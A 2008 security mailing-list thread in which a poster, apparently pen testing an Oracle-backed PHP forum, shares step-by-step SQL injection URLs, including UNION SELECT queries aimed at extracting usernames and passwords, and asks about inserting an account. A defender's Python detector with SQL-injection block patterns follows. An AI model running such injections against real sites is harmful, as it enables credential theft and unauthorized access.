Re: Oracle URL SQL Injection issue
- From: Clone <c70n3@xxxxxxxxxxx>
- Date: Tue, 22 Jan 2008 22:44:07 +0000 (GMT)
One more step closer
I'm able to enumerate the column names for the user table
as username and password.
http://x.y.z.a/item.php?Id=90%20union%20select%20username,password%20from%20usr
This doesn't generate an error. If I change the column
names a bit I get an error.
Unfortunately I'm not getting the data returned in
HTML. This is a private forum site. With the url above
I do get the page for the correct forum but nothing
about usr table.
Any pointers?
Can I use union to insert a username and password in
usr table?
--- Clone <c70n3@xxxxxxxxxxx> wrote:
Hmm.. with Jeff's input below I enumerate that there are 2
columns.
http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr
This time I gave
http://x.y.z.a/item.php?Id=90%20union%20select%201,'a'%20from%20usr
Now I get the following error:
ociexecute() [function.ociexecute]: OCIStmtExecute: ORA-01790: expression must have same datatype as corresponding expression in dbs.inc on line 44
Then I tried the following:
http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20*%20from%20usr;--
And I get the error
ociexecute() [function.ociexecute]: OCIStmtExecute: ORA-00911: invalid character in dbs.inc on line 44
The functionality of the page is to generate a
page/forum email page.
Any idea what's next?
--- Joseph McCray <joe@xxxxxxxxxxxxxxxxxxxxxxx> wrote:
How are you coming along with this? Are you still
having trouble?
Joe
On Fri, 2008-01-18 at 00:21 +0000, Clone wrote:
Hey List
I am pen testing a web app that supplies sql
parameters on the URL, something like
http://x.y.z.a/item.php?Id=90
I did blind sql injection by adding AND 1=1 to
confirm the vulnerability.
Now when I do
http://x.y.z.a/item.php?Id=90'
I get
ociparse() [function.ociparse]: OCIParse: ORA-01756: quoted string not properly terminated in on line 312
Then I tried (after confirming presence of the usr
table name)
and I get the error
ociexecute() [function.ociexecute]: OCIStmtExecute: ORA-01789: query block has incorrect number of result columns in dbs.inc on line 44
I know one valid user account in the oracle DB.
Any idea what's the best strategy to move
forward?
I'm not getting any further from here so far.
Any advice / help would be much appreciated.
Cheers
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------
--
Joe McCray
Toll Free: 1-866-892-2132
Email: joe@xxxxxxxxxxxxxxxxxxxxxxx
Web: https://www.learnsecurityonline.com
Learn Security Online, Inc.
* Security Games * Simulators
* Challenge Servers * Courses
* Hacking Competitions * Hacklab Access
"The only thing worse than training good employees
and losing them
is NOT training your employees and keeping them."
- Zig Ziglar
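A defender-side check for the pattern the thread describes (a numeric Id parameter concatenated into an Oracle query and probed with a stray quote, AND 1=1 and UNION SELECT), as an added example that is not code from the thread: it rejects any Id that is not a plain integer and runs the same check over constructed access-log lines with hypothetical client addresses. It assumes the endpoint only ever expects a numeric Id, as the URLs quoted in the thread suggest.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Anything a plain numeric identifier should never contain: UNION/SELECT probes,
# the AND 1=1 boolean test, and the stray quote / statement terminator seen above.
SUSPECT = re.compile(
    r"\bunion\b.*\bselect\b|\bselect\b.*\bfrom\b|\band\b\s+\d+\s*=\s*\d+|'|--|;",
    re.IGNORECASE,
)

def check_id(value: str):
    """Classify an already-decoded Id value. Only a plain decimal integer passes."""
    if re.fullmatch(r"\d{1,10}", value):
        return True, "numeric"
    m = SUSPECT.search(value)
    if m:
        return False, f"sql metacharacters in Id: {m.group(0)!r}"
    return False, "Id is not an integer"

def check_url(url: str):
    """Apply check_id to every Id= parameter of a request URL (percent-decoded)."""
    ids = parse_qs(urlsplit(url).query, keep_blank_values=True).get("Id", [""])
    for raw in ids:
        ok, reason = check_id(raw)
        if not ok:
            return False, reason
    return True, "numeric"

def scan_access_log(lines):
    """Yield (client, decoded path, reason) for suspicious item.php requests in common-log-format lines."""
    for line in lines:
        parts = line.split()
        if len(parts) < 7 or "item.php" not in parts[6]:
            continue
        ok, reason = check_url(parts[6])
        if not ok:
            yield parts[0], unquote_plus(parts[6]), reason

# Constructed sample log (hypothetical client addresses; the query strings are
# the ones quoted in the thread).
SAMPLE_LOG = """\
10.0.0.5 - - [22/Jan/2008:22:40:01 +0000] "GET /item.php?Id=90 HTTP/1.1" 200 5123
10.0.0.5 - - [22/Jan/2008:22:40:09 +0000] "GET /item.php?Id=90' HTTP/1.1" 500 412
10.0.0.5 - - [22/Jan/2008:22:41:30 +0000] "GET /item.php?Id=90%20union%20select%20username,password%20from%20usr HTTP/1.1" 200 5123
10.0.0.7 - - [22/Jan/2008:22:42:00 +0000] "GET /index.php HTTP/1.1" 200 800
""".splitlines()

if __name__ == "__main__":
    for client, path, reason in scan_access_log(SAMPLE_LOG):
        print(f"{client} {path} -> {reason}")
```

The durable fix is to pass Id to the query as a bind variable (oci_bind_by_name in PHP's OCI8 extension) instead of concatenating it into the SQL string; this check is the request-side signal while that change is made.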